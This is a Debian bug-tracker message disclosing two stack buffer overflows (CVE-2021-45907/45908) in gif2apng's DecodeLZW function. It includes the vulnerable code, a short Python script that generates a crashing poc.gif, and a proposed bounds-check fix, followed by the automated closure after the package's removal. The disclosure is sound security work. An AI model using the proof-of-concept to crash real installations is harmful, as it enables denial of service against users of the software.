[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Bug#1002669: marked as done (gif2apng: CVE-2021-45907 CVE-2021-45908: Two stack based buffer overflows in the DecodeLZW function)

Your message dated Mon, 07 Feb 2022 21:43:10 +0000
with message-id <[🔎] E1nHBmw-0002k2-QY@fasolo.debian.org>
and subject line Bug#1004933: Removed package(s) from unstable
has caused the Debian Bug report #1002669,
regarding gif2apng: CVE-2021-45907 CVE-2021-45908: Two stack based buffer overflows in the DecodeLZW function
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact owner@bugs.debian.org
immediately.)


-- 
1002669: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1002669
Debian Bug Tracking System
Contact owner@bugs.debian.org with problems
--- Begin Message --- 
Package: gif2apng
Version: 1.9+srconly-3
Severity: normal
Tags: security

Dear Maintainer,

There are two stack based buffer overflows in the gif2apng application. The responsible code is located in the DecodeLZW function and looks as follows:

void DecodeLZW(unsigned char * img, unsigned int img_size, FILE * f1) // added
parameter img_size
{
  int i, bits, codesize, codemask, clearcode, nextcode, lastcode;
  unsigned int   j;
  unsigned int   size = 0;
  unsigned int   accum = 0;
  unsigned short prefix[4097];
  unsigned char  suffix[4097];
  unsigned char  str[4097];
  unsigned char  data[1024];
  unsigned char  firstchar = 0;
  unsigned char *pstr = str;
  unsigned char *pout = img;
  unsigned char  mincodesize;

  if (fread(&mincodesize, 1, 1, f1) != 1) return;

  bits = 0;
  codesize = mincodesize + 1;
  codemask = (1 << codesize) - 1;
  clearcode = 1 << mincodesize;
  nextcode = clearcode + 2;
  lastcode = -1;

  for (i=0; i<clearcode; i++)
    suffix[i] = i;
[...]
        while (code >= clearcode)
        {
          *pstr++ = suffix[code];
          code = prefix[code];
        }

In both loops at the end it is possible to write over the boundaries of the buffer by providing certain values a part of the gif file. For the for loop we can provide a large value for mincodesize leading to a clearcode bigger than 4097 and therefore overflowing the buffer. In the while loop we can provide code values, that repeat so that prefix[code] results in the same code again.

I wrote the following script to generate a poc.gif file:

#!/bin/python3

# Writing to poc.gif
f = open("poc.gif", "wb")
# Data needed to enter the code path:
beginning = b"GIF87a" + b"\x10\x00\x10\x00" + b"\x01" * 3 + b"\x2c" + b"\x01" *
9
f.write(beginning)


mincode = b"\x07"
# Uncomment the following line to trigger the other crash
# mincode = b"\x10"
f.write(mincode)

# Size value and byte we write to the heap
target_char = b"\x01" + b"\xff\xfe"*10000
f.write(target_char)

f.close()

The poc.gif file generated by the script does trigger the overflow in the while loop. If the other value for mincode is used it should trigger the overflow in the for loop. Using the poc.gif file as follows led to a segmentation fault:
$ gif2apng -i0 poc.gif /dev/null

gif2apng 1.9 using ZLIB

Reading 'poc.gif'...
Speicherzugriffsfehler

As I see no way to control the data, that is written in the loops I do not think, that this can necessarily exploited to gain code execution.

I fixed the issue locally by introducing a variable, that keeps track of the amount of data written to the pstr pointer and by doing some boundary checks before writing to the buffers:

if (clearcode > 4097) { // Added to avoid stack overflow here
    printf("Invalid Image\n");
    exit(0);
  }
  for (i=0; i<clearcode; i++)
    suffix[i] = i;
[...]
        if (code >= nextcode)
        {
          if ( write_counter <= 4097) { // Added to fix stack overflow here
            *pstr++ = firstchar;
            write_counter++;
            code = lastcode;
          }
          else {
            printf("Invalid Image\n");
            exit(0);
          }
        }

        while (code >= clearcode)
        {
          if ( write_counter <= 4097) { // Added to fix stack overflow here
            *pstr++ = suffix[code];
            write_counter++;
            code = prefix[code];
          }
          else {
            printf("Invalid Image\n");
            exit(0);
          }
        }
        if ( write_counter <= 4097) { // Added to fix stack overflow here
          *pstr++ = firstchar = suffix[code];
          write_counter++;
        }
        else {
          printf("Invalid Image\n");
          exit(0);
        }

This seemed to fix the issue for me locally, but it could use some more testing.

Best regards
Kolja





-- System Information:
Debian Release: 10.11
  APT prefers oldstable-updates
  APT policy: (500, 'oldstable-updates'), (500, 'oldstable')
Architecture: amd64 (x86_64)

Kernel: Linux 4.19.0-18-amd64 (SMP w/8 CPU cores)
Kernel taint flags: TAINT_OOT_MODULE, TAINT_UNSIGNED_MODULE
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8), LANGUAGE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /usr/bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled

Versions of packages gif2apng depends on:
ii  libc6       2.28-10
ii  libzopfli1  1.0.2-1
ii  zlib1g      1:1.2.11.dfsg-1

gif2apng recommends no packages.

Versions of packages gif2apng suggests:
pn  apng2gif  <none>

-- no debconf information

--- End Message ---
--- Begin Message --- 
Version: 1.9+srconly-3+rm

Dear submitter,

as the package gif2apng has just been removed from the Debian archive
unstable we hereby close the associated bug reports.  We are sorry
that we couldn't deal with your issue properly.

For details on the removal, please see https://bugs.debian.org/1004933

The version of this package that was in Debian prior to this removal
can still be found using http://snapshot.debian.org/.

Please note that the changes have been done on the master archive and
will not propagate to any mirrors until the next dinstall run at the
earliest.

This message was generated automatically; if you believe that there is
a problem with it please contact the archive administrators by mailing
ftpmaster@ftp-master.debian.org.

Debian distribution maintenance software
pp.
Scott Kitterman (the ftpmaster behind the curtain)

--- End Message ---
Reply to: